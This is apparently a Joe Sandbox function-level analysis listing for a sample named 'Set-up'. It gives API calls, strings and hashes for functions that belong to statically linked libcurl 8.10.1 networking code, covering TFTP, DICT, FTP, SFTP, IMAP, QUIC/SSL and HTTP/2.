Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: fclose$feoffreadmemchrrewind$fopenisspace
String ID: Invalid data in public key file$Invalid key data, not base64 encoded$Invalid public key data$Missing public key data$Unable to allocate memory for public key data$Unable to open public key file$Unable to read public key from file
API String ID: 752180523-3150497671
Opcode ID: ec71089330249447712ecb630fdc9e2d2e78b2ae80ccb40d25f7414b83b9eb7c
Instruction ID: 399feaacba3259bb55c8c0cbb17be851e40e24569b7386da970476965eb784ca
Opcode Fuzzy Hash: ec71089330249447712ecb630fdc9e2d2e78b2ae80ccb40d25f7414b83b9eb7c
Instruction Fuzzy Hash: 5D5106F0A053056FDA106A79AC49EAB3ADCDFA6658F041438FC4EE23C3F631E9548566

Function 00E327E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E32AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E32B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00E32D30
WSAGetLastError.WS2_32 ref: 00E32D3A

Strings

Internal state machine error, xrefs: 00E328C5
0, xrefs: 00E32B94
blksize, xrefs: 00E32C33
%lld, xrefs: 00E32B82
tsize, xrefs: 00E32BAD
TFTP finished, xrefs: 00E3289C
tftp.c, xrefs: 00E32B03, 00E32C6E, 00E32D62
TFTP buffer too small for options, xrefs: 00E32C60
netascii, xrefs: 00E32810, 00E32B23
tftp_send_first: internal error, xrefs: 00E3295C
Connected for receive, xrefs: 00E3290B, 00E3298A
octet, xrefs: 00E3280B
timeout, xrefs: 00E32CD3
Connected for transmit, xrefs: 00E329E0, 00E32A34
%s%c%s%c, xrefs: 00E32B2A
TFTP filename too long, xrefs: 00E32AF5

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: 2abc1a50f3e37aaa64fde54cabe153b21ef0e8cc5ddaeb1e490a81c5315f16cb
Instruction ID: ff1ca2cf4a892ad0dc42509e89c35c998bf8370862ea99356424dbdfb5278a2e
Opcode Fuzzy Hash: 2abc1a50f3e37aaa64fde54cabe153b21ef0e8cc5ddaeb1e490a81c5315f16cb
Instruction Fuzzy Hash: 6DE1D8B1B003016BD7149B24DC8AFAA7B94AF51708F04556CFB887B393EB76E854C791

Function 00DE4720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00DE4749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 00DE48E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00DE491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE4963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00DE4971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE497B

Part of subcall function 00DE06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00DE5663,?), ref: 00DE06F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE4A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00DE4A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE4A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00DE4AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE4AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00DE4B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE4B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00DE4B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE4B80

Strings

urlapi.c, xrefs: 00DE47B9, 00DE47CC, 00DE47E2, 00DE482C, 00DE4856, 00DE4879, 00DE49A6
%ld, xrefs: 00DE49BC
%u.%u.%u.%u, xrefs: 00DE4C00

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: 301996bba5af3a950be6b65cef2dc6d60830da8715a4311f2d0605e0b0480182
Instruction ID: 004cac7509c829c2daa045d9cf94e9bb6f53160c9dda2c52be9be1e6d7d1c53b
Opcode Fuzzy Hash: 301996bba5af3a950be6b65cef2dc6d60830da8715a4311f2d0605e0b0480182
Instruction Fuzzy Hash: 90D123B1904281ABE7207B26DC46B3F7BD89F51358F09443CF8899B282E779DD5487B2

Function 00E063E0 Relevance: 31.8, APIs: 8, Strings: 13, Instructions: 330stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E086F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000003), ref: 00E08704

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00E06460
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00E06472
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00E06487
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00E0649C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00E06654
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00E06666
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00E0667B

Strings

/FIND:, xrefs: 00E06441
CLIENT libcurl 8.10.1DEFINE %s %sQUIT, xrefs: 00E066E0
/D:, xrefs: 00E0661E
default, xrefs: 00E064C1, 00E06564, 00E06697
CLIENT libcurl 8.10.1MATCH %s %s %sQUIT, xrefs: 00E065B9
/LOOKUP:, xrefs: 00E06635
dict.c, xrefs: 00E06706, 00E06719
lookup word is missing, xrefs: 00E064DF, 00E066B5
/MATCH:, xrefs: 00E06413
CLIENT libcurl 8.10.1%sQUIT, xrefs: 00E06778
Failed sending DICT request, xrefs: 00E065D1, 00E066F4, 00E0678C
/M:, xrefs: 00E0642A
/DEFINE:, xrefs: 00E06607

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strchr$strlen
String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 8.10.1%sQUIT$CLIENT libcurl 8.10.1DEFINE %s %sQUIT$CLIENT libcurl 8.10.1MATCH %s %s %sQUIT$Failed sending DICT request$default$dict.c$lookup word is missing
API String ID: 842768466-2079990832
Opcode ID: ec9d01ce82c92ceab1da6c6b0010a5ac2c4e944fbe8195b5e39a069187f9269c
Instruction ID: 3cacf032e00c9beba39f8d893e7dc9d4584991a7d300661ec036698279ffbebd
Opcode Fuzzy Hash: ec9d01ce82c92ceab1da6c6b0010a5ac2c4e944fbe8195b5e39a069187f9269c
Instruction Fuzzy Hash: 5AA10A61E0435166EB312735AD02B3A3A8D9F6174CF096078FD85BA2D3FA61DDF4C262

Function 00EAC700 Relevance: 30.2, APIs: 6, Strings: 11, Instructions: 478COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00EAC719
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00EAC7C9
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00EACB6F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(013EC3D8,sftp.c,000006F4), ref: 00EACD6E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left,sftp.c,000005EE), ref: 00EACD83
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->eof,sftp.c,000005EF), ref: 00EACD98

Strings

SFTP Protocol badness: unrecognised read request response, xrefs: 00EACCB3
Read Packet At Unexpected Offset, xrefs: 00EACCBD
FXP_READ response too big, xrefs: 00EACCCE
gesftp_read() internal error, xrefs: 00EACA72
SFTP READ error, xrefs: 00EACCFF
SFTP Protocol badness, xrefs: 00EACCC7
rc != LIBSSH2_ERROR_EAGAIN || !filep->eof, xrefs: 00EACD93
sftp.c, xrefs: 00EACD64, 00EACD79, 00EACD8E
rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left, xrefs: 00EACD7E
malloc fail for FXP_WRITE, xrefs: 00EACCDB
Response too small, xrefs: 00EACC86

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert$memcpy$_time64
String ID: FXP_READ response too big$Read Packet At Unexpected Offset$Response too small$SFTP Protocol badness$SFTP Protocol badness: unrecognised read request response$SFTP READ error$gesftp_read() internal error$malloc fail for FXP_WRITE$rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left$rc != LIBSSH2_ERROR_EAGAIN || !filep->eof$sftp.c
API String ID: 2498518694-199359813
Opcode ID: d876f1a9865f7085b36c410c751db603de65a24c53eb4a7cc7e41811dedc3131
Instruction ID: c404643ac5580da2ae1fcb1276f06b2bb515d13260eb80dac3fef8076cfcbfe6
Opcode Fuzzy Hash: d876f1a9865f7085b36c410c751db603de65a24c53eb4a7cc7e41811dedc3131
Instruction Fuzzy Hash: F202A1B19043049FC710DF24D845B9ABBE4AF8E358F25592DF85AAB351E770F904CB92

Function 00DF08C2 Relevance: 28.3, APIs: 4, Strings: 12, Instructions: 295stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DF090A
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00DF0979

Strings

vssh/libssh2.c, xrefs: 00DF09BD, 00DF09DE, 00DF2AB9, 00DF2ADA, 00DF32C1, 00DF32E2, 00DF3BBA, 00DF3BDC, 00DF4746, 00DF476C
incorrect date format for %.*s, xrefs: 00DF4738
Syntax error: chown uid not a number, xrefs: 00DF3304
date overflow, xrefs: 00DF3F94
atime, xrefs: 00DF3F47, 00DF4856
chmod, xrefs: 00DF08E2, 00DF2A66
mtime, xrefs: 00DF3F5B
Syntax error: chgrp gid not a number, xrefs: 00DF0A00
chgrp, xrefs: 00DF0959
Syntax error: chmod permissions not a number, xrefs: 00DF2AFC
Attempt to get SFTP stats failed: %s, xrefs: 00DF3C06
chown, xrefs: 00DF325D

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlenstrtoul
String ID: Attempt to get SFTP stats failed: %s$Syntax error: chgrp gid not a number$Syntax error: chmod permissions not a number$Syntax error: chown uid not a number$atime$chgrp$chmod$chown$date overflow$incorrect date format for %.*s$mtime$vssh/libssh2.c
API String ID: 4005410869-1121828786
Opcode ID: f362eade394027d096f7c8474395045adeabf30c8a681b5782fe04a847df4584
Instruction ID: e321dde99a1650e1f3273aa488ea18ac1d4cf0bd8dcbcb182eff0c155d807a11
Opcode Fuzzy Hash: f362eade394027d096f7c8474395045adeabf30c8a681b5782fe04a847df4584
Instruction Fuzzy Hash: 81B1F874B14301AFE311AF24DC46B6B77E5EF44718F04452CFA586B392E771A914CBA2

Function 00E3C350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 00E3C37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 00E3C476
WSAGetLastError.WS2_32 ref: 00E3C4AE

Strings

SSL certificate problem: %s, xrefs: 00E3C420
Unknown error, xrefs: 00E3C468, 00E3C474
QUIC connection has been shut down, xrefs: 00E3C3D1
SSL certificate verification failed, xrefs: 00E3C582
unknown, xrefs: 00E3C374
r, xrefs: 00E3C561
Unkn, xrefs: 00E3C578
SSL_ERROR unknown, xrefs: 00E3C502, 00E3C524
No error, xrefs: 00E3C463
own , xrefs: 00E3C570
QUIC connect: %s in connection to %s:%d (%s), xrefs: 00E3C525
SSL_ERROR_SYSCALL, xrefs: 00E3C4F5
erro, xrefs: 00E3C568

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
API String ID: 31095072-3036451936
Opcode ID: e1996b7b2c8fada51d911ca1ba0026ff005a315e3384ae5d442a7c6d3f706e79
Instruction ID: 100385c3a61f5c78008df345190c9c69ca3a6e77fada27dcfb56c21a41af38a5
Opcode Fuzzy Hash: e1996b7b2c8fada51d911ca1ba0026ff005a315e3384ae5d442a7c6d3f706e79
Instruction Fuzzy Hash: 7D5129B19083446BD710AA549C45BAFBB94DF9130CF24942DFA88BB242E679D944CB53

Function 00E0A33B Relevance: 27.4, APIs: 1, Strings: 17, Instructions: 425stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E0A33C

Strings

[%s] closing DATA connection, xrefs: 00E0A353
server did not report OK, got %d, xrefs: 00E0A937
*, xrefs: 00E0A6D4
QUOT string not accepted: %s, xrefs: 00E0A6E9
Uploaded unaligned file size (%lld out of %lld bytes), xrefs: 00E0A5B2
Failure sending ABOR command: %s, xrefs: 00E0A866
, xrefs: 00E0A7CF
Received only partial file: %lld bytes, xrefs: 00E0A604
No data was received, xrefs: 00E0A45B
Remembering we are in dir "%s", xrefs: 00E0A7E9
[%s] done, result=%d, xrefs: 00E0A778
partial download completed, closing connection, xrefs: 00E0A912
???, xrefs: 00E0A34D, 00E0A352, 00E0A76F, 00E0A777
control connection looks dead, xrefs: 00E0A567
Exceeded storage allocation, xrefs: 00E0A8C4
ftp.c, xrefs: 00E0A5D9, 00E0A786
ABOR, xrefs: 00E0A83B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $*$???$ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$QUOT string not accepted: %s$Received only partial file: %lld bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%lld out of %lld bytes)$[%s] closing DATA connection$[%s] done, result=%d$control connection looks dead$ftp.c$partial download completed, closing connection$server did not report OK, got %d
API String ID: 39653677-2752486839
Opcode ID: 50c23c803505a99ee187c8db47a0c74f11a5719b33d9a99fb73cc8f731955b7a
Instruction ID: b0b8e4f75eac7bf895be15b8e40a0bccb9ca682988afda78c1f14faeba605715
Opcode Fuzzy Hash: 50c23c803505a99ee187c8db47a0c74f11a5719b33d9a99fb73cc8f731955b7a
Instruction Fuzzy Hash: 74F1E3716083059BD714DF14D881B6AB7E5AF84308F0CA97CF988AB2C2E775D984CB52

Function 00E523C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 277COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= datamax,nghttp2_session.c,00001E56), ref: 00E525EA
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(bufs->head == bufs->cur,nghttp2_session.c,00001E22,FFFFFE38,00000000), ref: 00E526C7
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(013BC348,nghttp2_session.c,00001E67), ref: 00E526DC
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(&session->aob.framebufs == bufs,nghttp2_session.c,00001E4D), ref: 00E526F1
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS,nghttp2_session.c,00000438), ref: 00E52706
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_session.c,00000446), ref: 00E5271B

Strings

&session->aob.framebufs == bufs, xrefs: 00E526EC
bufs->head == bufs->cur, xrefs: 00E526C2
nghttp2_session.c, xrefs: 00E525E0, 00E526BD, 00E526D2, 00E526E7, 00E526FC, 00E52711
urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS, xrefs: 00E52701
nghttp2_buf_avail(buf) >= datamax, xrefs: 00E525E5
0 == rv, xrefs: 00E52716

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: &session->aob.framebufs == bufs$0 == rv$bufs->head == bufs->cur$nghttp2_buf_avail(buf) >= datamax$nghttp2_session.c$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
API String ID: 1222420520-4202471155
Opcode ID: 669ff20db672b7da591535dd13433c7e0a59d32bf9c34274af7997199dcf6d3a
Instruction ID: 7f1be5ee4256b3d28e89b316bfbc26cf8cfd960c5f364c1e1394961e5d3d89c3
Opcode Fuzzy Hash: 669ff20db672b7da591535dd13433c7e0a59d32bf9c34274af7997199dcf6d3a
Instruction Fuzzy Hash: F1A119316003419FD714CF24C885B6ABBE2BF8530AF04996CFE59AB292E771DD49CB52

Function 00E225D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

CAPABILITY, xrefs: 00E22797
AUTH, xrefs: 00E228C5
Got unexpected imap-server response, xrefs: 00E23034
PREAUTH connection, already authenticated, xrefs: 00E22770
STARTTLS not available., xrefs: 00E23094
SASL, xrefs: 00E22892
LOGINDISABLED, xrefs: 00E22867
STAR, xrefs: 00E2283C
L-IR, xrefs: 00E2289C
TTLS, xrefs: 00E22846
STARTTLS denied, xrefs: 00E23068
STARTTLS, xrefs: 00E22D47

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
